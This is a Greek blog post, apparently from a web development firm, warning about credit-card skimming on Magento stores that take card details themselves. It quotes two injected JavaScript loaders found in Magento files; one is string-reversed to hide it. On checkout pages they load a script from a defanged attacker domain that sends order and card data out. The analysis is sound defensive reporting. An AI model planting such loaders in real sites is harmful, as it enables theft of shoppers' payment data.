Δεν πρόκειται για κινηματογραφική ταινία, αλλά αν βάλετε στην θέση των κυριών τις πιστωτικές κάρτες τότε θα καταλήξουμε σε κάτι που ταλάνιζε τις ιστοσελίδες ηλεκτρονικού εμπορίου από πάντα και που τελευταία παρατηρείται εκ νέου έξαρση.
Από τις πρώτες ημέρες του ηλεκτρονικού εμπορίου και των πληρωμών με πιστωτικές κάρτες, εμφανίστηκαν διάφοροι «καλοθελητές» που βοηθούσαν τους ιδιοκτήτες των πιστωτικών καρτών να ξεφορτωθούν λίγα χρήματα παραπάνω από αυτά που υπολόγιζαν πραγματοποιώντας μια online αγορά!!! Κοινώς… τους έκλεβαν τους κωδικούς!
Η τεχνολογία είναι προσαρμοζόμενο είδος όμως και σχετικά γρήγορα οι τράπεζες έδωσαν την δυνατότητα στα ηλεκτρονικά καταστήματα να διασυνδέονται μαζί τους για την εκκαθάριση των πιστωτικών καρτών, πραγματοποιώντας την συναλλαγή στο περιβάλλον της τράπεζας και όχι στο ηλεκτρονικό κατάστημα. Με αυτό τον τρόπο, κατά πολύ μεγάλο βαθμό, οι συναλλαγές ήταν απρόσκοπτες και σχεδόν αδύνατο να «σπάσουν» τα 256-bit ασφαλείας των τραπεζών από τον οποιονδήποτε.
Ο καιρός πέρασε, τα ηλεκτρονικά καταστήματα φύτρωσαν σαν τα μανιτάρια μετά από βροχή και αν και η ενδεδειγμένη λύση για πληρωμή με πιστωτική κάρτα είναι η ανακατεύθυνση στο περιβάλλον της συνεργαζόμενης τράπεζας, πολλά ηλεκτρονικά καταστήματα, τελευταία, δεν την υιοθετούν.
Ο λόγος; Το κόστος υλοποίησης της σύνδεσης της ιστοσελίδας με τα τραπεζικά συστήματα ανεβάζει κατά τι, το συνολικό κόστος κατασκευής του ηλεκτρονικού καταστήματος.
Δυστυχώς όμως αυτό το ελάχιστο κόστος (κυμαίνεται από 100 έως 200 ευρώ αφ’ άπαξ) είναι ικανό να πείσει τους ιδιοκτήτες των ηλεκτρονικών καταστημάτων να μην προχωρήσουν στην σύνδεση. Ακόμη χειρότερα, υπάρχουν και εταιρείες κατασκευής ιστοσελίδων που δεν ενημερώνουν επαρκώς τον ιδιοκτήτη για τα προβλήματα που μπορεί να έχει με αποτέλεσμα την παρακάτω ιστορία…
Το Magento, αποτελεί τον οδοστρωτήρα στα λογισμικά ηλεκτρονικού εμπορίου. Πρόκειται για την πληρέστερη και αποτελεσματικότερη λύση ηλεκτρονικού καταστήματος που υπάρχει, εδώ και πολλά χρόνια. Γραμμένο σε γλώσσα προγραμματισμού PHP, παρέχει στον developer απίστευτα εργαλεία ανάπτυξης του πιο δαιδαλώδους website που μπορεί να σκεφτεί κάποιος. Τα ίδια εργαλεία όμως παρέχονται και στους «καλοθελητές».
Εδώ λοιπόν, έρχονται να κολλήσουν οι κλέφτες κυριών.
Η τελευταία μόδα στις υποκλοπές πιστωτικών καρτών είναι ακόμη πιο έξυπνη και την είδαμε σε 2 ιστοσελίδες με λογισμικό Magento, που ήρθαν σε εμάς για να τους βοηθήσουμε (μιας και οι ιστοσελίδες δεν κατασκευάστηκαν αρχικά από εμάς).
Πλέον το hacking δεν γίνεται απ’ ευθείας στον κώδικα στης ιστοσελίδας ή έστω δεν γίνεται σε τόσο εκτεταμένο βαθμό injected code. Πλέον οι «καλοθελητές» απλά εισάγουν έναν man in the middle στην διαδικασία του checkout των ηλεκτρονικών καταστημάτων.
Η επίθεση τοποθετεί απλά ένα εξωγενές αρχείο javascript στην διαδικασία του checkout.
Δείτε ένα snippet κώδικα που βρέθηκε στο αρχείο /js/lib/ccard.js
<!– Google Code for Remarketing Tag –>
if((new RegExp(‘onepage|checkout|onestep|firecheckout’)).test(window.location))
{document.write(‘<script src=”hxxps://jquery -cdn .top/mage .js”></script>’)};
<!– Google Code for Remarketing Tag –>
Αν μεταφράσουμε αυτό το σημείο κώδικα σε απλή γλώσσα, θα δούμε ότι στην διαδικασία του checkout, όταν καλείται η σελίδα onestep του Magento, φορτώνεται ένα αρχείο javascript από το domain h–ps://jquery-cdn . top το οποίο με την σειρά του συνδέεται με το αρχείο h–ps://jquery-cdn . top/ mag.php στο ίδιο εξωγενές domain.
Τι σημαίνουν όλα αυτά; Πολύ απλά… η διαδικασία του checkout ολοκληρώνεται κανονικά μεν αλλά πριν ολοκληρωθεί ΟΛΑ ΤΑ ΔΕΔΟΜΕΝΑ ΑΥΤΗΣ (στοιχεία αγοράς, πιστωτικών καρτών που δίδονται στην παραγγελία κλπ) προωθούνται στο εξωγενές domain που είδαμε παραπάνω.
Μια παραλλαγή έκδοση του συγκεκριμένου κώδικα, βρέθηκε και στο αρχείο /js/scriptaculous/effects.js του Magento.
if((new RegExp(‘onepage|checkout|onestep|fircheckout’)).test(window.location)) {document.write(‘>tpircs/<>”sj.egam/ue.todstats//:sp–h”=crs tpircs<‘.split(“”).reverse().join(“”))}
ΣΗΜΑΝΤΙΚΗ ΛΕΠΤΟΜΕΡΕΙΑ
Οι παραπάνω κώδικες βρέθηκαν μέσα στα επίσημα αρχεία του Magento και δεν αποτελούσαν προσθήκες ξεχωριστών αρχείων, κάνοντας την ανεύρεση τους, εξαιρετικά δύσκολη υπόθεση.
Φυσικά, για όλη αυτή την ταλαιπωρία δεν ευθύνεται το Magento ως πλατφόρμα. Ευθύνεται η εταιρεία που κατασκεύασε την ιστοσελίδα και που επέτρεψε στην διαδικασία του checkout να δίνονται ευαίσθητα δεδομένα πιστωτικών καρτών πελατών.
Το τεχνικό τμήμα του isotopon αποτρέπει μόνιμα τους ενδιαφερόμενους πελάτες να υλοποιήσουν κάτι τέτοιο, παρά τους προτρέπει να διασυνδεθούν με την τράπεζα την ίδια για την εκκαθάριση των πιστωτικών καρτών και σε περίπτωση επιμονής του ενδιαφερομένου, το project ακυρώνεται μονομερώς από την πλευρά μας και επιστρέφονται πλήρως τα χρήματα της προκαταβολής στον ενδιαφερόμενο.
Δεν μπορούμε, σε καμία περίπτωση, να διακινδυνεύσουμε την ασφάλεια των πελατών μας αλλά και των πελατών των ηλεκτρονικών καταστημάτων που κατασκευάζουμε.
Σε κάθε περίπτωση, βρισκόμαστε στην διάθεσή σας για να συζητήσουμε την δική σας περίπτωση και να σας συμβουλεύσουμε για την καλύτερη δυνατή λύση, χωρίς να έχουμε ως πρωτεύοντα στόχο το κέρδος, αλλά την δική σας ασφάλεια.
Επικοινωνήστε μαζί μας στο 2441 500500 και ένας συνεργάτης μας, θα βρεθεί στο πλευρό σας